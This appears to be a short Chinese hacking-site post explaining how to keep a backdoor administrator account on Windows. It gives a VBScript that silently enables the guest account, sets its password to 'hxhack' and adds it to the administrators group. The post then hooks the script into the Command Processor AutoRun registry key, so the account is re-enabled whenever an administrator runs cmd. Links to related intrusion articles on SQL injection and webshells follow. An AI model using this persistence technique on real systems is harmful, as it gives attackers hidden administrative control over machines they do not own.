建立不死帐号 dim wshset wsh=createobject("wscript.shell")wsh.run "net user guest /active:yes",0 (激活guest账号)wsh.run "net user guest hxhack&qu... 08-10-08
dim wsh
set wsh=createobject("wscript.shell")
wsh.run "net user guest /active:yes",0 (激活guest账号)
wsh.run "net user guest hxhack",0 (修改guest密码为hxhack)
wsh.run "net localgroup administrators guest /add",0 (添加guest到管理组)
然后把这个.txt文件的扩展名改为 .vbs即可
然后打开注册表修改注册标里面的:
hkey_local_machine\software\microsoft\command processor\autorun
在键值里面加入你vbs文件的路径就ok,然后运行vbs文件,不死账号出来拉
如果管理员把你动过手脚的guest账号停了,当时他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那vbs文件.
相关文章:
-
MYSQL数据库注射精华
MYSQL数据库注射精华 鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教. 本文需要有基础的SQL语句知识才可以更好的理解.建...
[阅读全文]
-
内网渗透——如何打开突破口
内网渗透——如何打开突破口 内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破,一个大型的网站,一个大型的公司,一个大型的目标,在外肉,管理员总会...
[阅读全文]
-
-
菜鸟拿WebShell的经验
菜鸟拿WebShell的经验 通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来...
[阅读全文]
-
UPDATE注射的两个基本模式
UPDATE注射的两个基本模式 一.测试环境: OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache ...
[阅读全文]
-
黑客如何破坏杀毒软件
黑客如何破坏杀毒软件 最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今...
[阅读全文]
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论